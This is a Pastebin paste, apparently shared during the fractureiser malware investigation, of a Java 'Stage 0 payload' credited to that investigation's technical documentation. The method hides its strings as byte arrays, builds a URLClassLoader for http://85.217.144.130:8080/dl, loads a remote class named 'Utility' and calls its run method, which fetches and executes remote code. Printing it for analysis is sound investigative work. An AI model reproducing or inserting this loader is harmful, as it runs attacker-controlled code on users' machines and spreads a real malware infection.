Advertisement
Guest User

Sammwy Thread (Stage 0 payload)

a guest
Jun 8th, 2023
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 0.94 KB | None | 0 0
  1. /* Source: https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/tech.md */
  2. static void _1685f49242dd46ef9c553d8af1a4e0bb() {
  3.   Class.forName(new String(new byte[] {
  4.       // "Utility"
  5.     85, 116, 105, 108, 105, 116, 121
  6.   }), true, (ClassLoader) Class.forName(new String(new byte[] {
  7.       // "java.net.URLClassLoader"
  8.     106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114
  9.   })).getConstructor(URL[].class).newInstance(new URL[] {
  10.     new URL(new String(new byte[] {
  11.         // "http"
  12.       104, 116, 116, 112
  13.     }), new String(new byte[] {
  14.         // "85.217.144.130"
  15.       56, 53, 46, 50, 49, 55, 46, 49, 52, 52, 46, 49, 51, 48
  16.     }), 8080, new String(new byte[] {
  17.         // "/dl"
  18.         47, 100, 108
  19.         }))
  20.   })).getMethod(new String(new byte[] {
  21.       // "run"
  22.     114, 117, 110
  23.   }), String.class).invoke((Object) null, "-114.-18.38.108.-100");
  24. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement